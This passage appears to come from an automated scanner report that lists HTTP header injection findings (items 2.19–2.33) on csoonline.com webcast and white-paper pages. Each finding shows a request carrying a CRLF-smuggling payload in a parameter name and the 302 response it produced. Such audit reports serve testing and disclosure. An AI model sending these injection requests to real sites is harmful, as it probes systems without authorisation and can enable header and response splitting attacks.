Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:23 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/653065/perspectives-on-pci-2.0-actionable-insights-for-your-compliance-program?d57a1
0a7a5387037=1
Content-Length: 170
Keep-Alive: timeout=5, max=6
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:03 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/653065/perspectives-on-pci-2.0-actionable-insights-for-your-compliance-program?d57a1
0a7a5387037=1">here</a>

2.19. http://www.csoonline.com/webcast/660768/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/660768/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 395f6%0d%0a4e1529cea74 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/660768/?395f6%0d%0a4e1529cea74=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:21 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/660768/data-security-during-data-recovery?395f6
4e1529cea74=1
Content-Length: 133
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:02 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/660768/data-security-during-data-recovery?395f6
4e1529cea74=1">here</a>

2.20. http://www.csoonline.com/webcast/661718/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/661718/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3b141%0d%0a856b47c58ff was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/661718/?3b141%0d%0a856b47c58ff=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:17 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/661718/mcafee-network-security?3b141
856b47c58ff=1
Content-Length: 122
Keep-Alive: timeout=5, max=6
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:50:58 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/661718/mcafee-network-security?3b141
856b47c58ff=1">here</a>

2.21. http://www.csoonline.com/webcast/663332/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/663332/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 41fe9%0d%0ad26cb1d8012 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/663332/?41fe9%0d%0ad26cb1d8012=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:16 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/663332/best-practices-for-tackling-security-early-in-development?41fe9
d26cb1d8012=1
Content-Length: 156
Keep-Alive: timeout=5, max=49
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:50:57 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/663332/best-practices-for-tackling-security-early-in-development?41fe9
d26cb1d8012=1">here</a>

2.22. http://www.csoonline.com/webcast/666090/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/666090/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 67db0%0d%0a292c304d402 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/666090/?67db0%0d%0a292c304d402=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:16 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/666090/today-s-changing-security-threats-demand-the-zero-trust-model-a-niksun-webcast-featuring-independent-research-firm?67db0
292c304d402=1
Content-Length: 213
Keep-Alive: timeout=5, max=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:50:56 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/666090/today-s-changing-security-threats-demand-the-zero-trust-model-a-niksun-webcast-featuring-independent-research-firm?67db0
292c304d402
...[SNIP]...

2.23. http://www.csoonline.com/white-paper/647166/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/647166/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d8fc7%0d%0a469267247bc was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647166/?d8fc7%0d%0a469267247bc=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:14 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647166/email-protection-buyer-s-guide?d8fc7
469267247bc=1
Content-Length: 133
Keep-Alive: timeout=5, max=57
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:55 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647166/email-protection-buyer-s-guide?d8fc7
469267247bc=1">here</a>

2.24. http://www.csoonline.com/white-paper/647167/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/647167/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 420f7%0d%0a5445852b3e5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647167/?420f7%0d%0a5445852b3e5=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:18 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647167/how-whole-disk-encryption-works?420f7
5445852b3e5=1
Content-Length: 134
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:58 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647167/how-whole-disk-encryption-works?420f7
5445852b3e5=1">here</a>

2.25. http://www.csoonline.com/white-paper/647168/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/647168/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 43080%0d%0a10013b322d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647168/?43080%0d%0a10013b322d=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:11 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647168/anatomy-of-a-data-breach?43080
10013b322d=1
Content-Length: 126
Keep-Alive: timeout=5, max=62
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:52 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647168/anatomy-of-a-data-breach?43080
10013b322d=1">here</a>

2.26. http://www.csoonline.com/white-paper/647169/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/647169/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 60aa5%0d%0ac0969c08704 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647169/?60aa5%0d%0ac0969c08704=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:17 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647169/data-loss-risks-during-downsizing?60aa5
c0969c08704=1
Content-Length: 136
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:57 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647169/data-loss-risks-during-downsizing?60aa5
c0969c08704=1">here</a>

2.27. http://www.csoonline.com/white-paper/647170/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/647170/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b1475%0d%0a3c8012e4482 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647170/?b1475%0d%0a3c8012e4482=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:15 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647170/machine-learning-sets-new-standard-for-dlp?b1475
3c8012e4482=1
Content-Length: 145
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:55 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647170/machine-learning-sets-new-standard-for-dlp?b1475
3c8012e4482=1">here</a>

2.28. http://www.csoonline.com/white-paper/647442/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/647442/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 5d62d%0d%0a017e807ca48 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647442/?5d62d%0d%0a017e807ca48=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:59 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647442/log-management-in-a-cyberworld?5d62d
017e807ca48=1
Content-Length: 133
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:40 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647442/log-management-in-a-cyberworld?5d62d
017e807ca48=1">here</a>

2.29. http://www.csoonline.com/white-paper/660813/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/660813/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload ae70b%0d%0a3cb69267c07 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660813/?ae70b%0d%0a3cb69267c07=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:52 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660813/data-recovery-solution-data-security-problem?ae70b
3cb69267c07=1
Content-Length: 147
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:33 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660813/data-recovery-solution-data-security-problem?ae70b
3cb69267c07=1">here</a>

2.30. http://www.csoonline.com/white-paper/660814/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/660814/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b1583%0d%0ab9f8cde5b37 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660814/?b1583%0d%0ab9f8cde5b37=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:54 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660814/security-of-data-recovery-operations?b1583
b9f8cde5b37=1
Content-Length: 139
Keep-Alive: timeout=5, max=7
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:35 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660814/security-of-data-recovery-operations?b1583
b9f8cde5b37=1">here</a>

2.31. http://www.csoonline.com/white-paper/660815/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/660815/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 55825%0d%0ae2c1cf498b2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660815/?55825%0d%0ae2c1cf498b2=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:55 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660815/closing-an-overlooked-vulnerability?55825
e2c1cf498b2=1
Content-Length: 138
Keep-Alive: timeout=5, max=11
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:36 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660815/closing-an-overlooked-vulnerability?55825
e2c1cf498b2=1">here</a>

2.32. http://www.csoonline.com/white-paper/660816/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/660816/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f9e10%0d%0ab28c22dbeb9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660816/?f9e10%0d%0ab28c22dbeb9=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:55 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660816/checklist-for-vetting-third-party-data-recovery-service-providers?f9e10
b28c22dbeb9=1
Content-Length: 168
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:35 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660816/checklist-for-vetting-third-party-data-recovery-service-providers?f9e10
b28c22dbeb9=1">here</a>

2.33. http://www.csoonline.com/white-paper/660817/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/660817/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 6440f%0d%0a33b5bc40b94 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660817/?6440f%0d%0a33b5bc40b94=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:56 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660817/what-nist-recommends-before-using-a-third-party-data-recovery-vendor?6440f
33b5bc40b94=1
Content-Length: 171
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:36 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660817/what-nist-recommends-before-using-a-third-party-data-recovery-vendor?6440f
33b5bc40b94=1">here</a>

